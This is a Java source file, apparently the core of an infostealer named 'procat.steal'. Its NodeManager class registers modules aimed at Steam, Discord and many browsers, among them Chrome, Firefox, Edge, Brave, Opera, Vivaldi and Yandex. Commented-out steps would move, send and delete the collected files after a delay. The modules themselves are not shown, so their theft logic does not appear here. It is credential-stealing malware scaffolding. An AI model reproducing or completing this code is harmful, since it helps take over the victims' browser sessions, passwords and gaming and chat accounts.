package procat.steal.nodes;

import procat.steal.nodes.file.CreateFile;
import procat.steal.nodes.impl.app.Discord;
import procat.steal.nodes.impl.app.Steam;
import procat.steal.nodes.impl.browser.*;

import java.util.ArrayList;
import java.util.List;


public class NodeManager {
	private Steam steam;
	private Discord discord;
	private CreateFile createFile;
	private Brave brave;
	private Chrome chrome;
	private Edge edge;
	private Firefox firefox;
	private Opera opera;
	private OperaGX operagx;
	private Vivaldi vivaldi;
	private Yandex yandex;
//	private MoveFile moveFile;
//	private SendFile sendFile;
//	private DeleteFile tempFile;
	public List<Node> nodes = new ArrayList<>();

	public void start() throws InterruptedException {
		steam = new Steam();
		discord = new Discord();
		createFile = new CreateFile();
		brave = new Brave();
		chrome = new Chrome();
		edge = new Edge();
		firefox = new Firefox();
		opera = new Opera();
		operagx = new OperaGX();
		vivaldi = new Vivaldi();
		yandex = new Yandex();
//		moveFile = new MoveFile();
//		sendFile = new SendFile();
//		Thread.sleep(60000);
//		tempFile = new DeleteFile();
	}

	public void launch() throws InterruptedException {
		start();
		nodes.add(steam);
		nodes.add(discord);
		nodes.add(createFile);
		nodes.add(brave);
		nodes.add(chrome);
		nodes.add(edge);
		nodes.add(firefox);
		nodes.add(opera);
		nodes.add(operagx);
		nodes.add(vivaldi);
		nodes.add(yandex);
//		nodes.add(moveFile);
//		nodes.add(sendFile);
//		nodes.add(tempFile);
	}
}
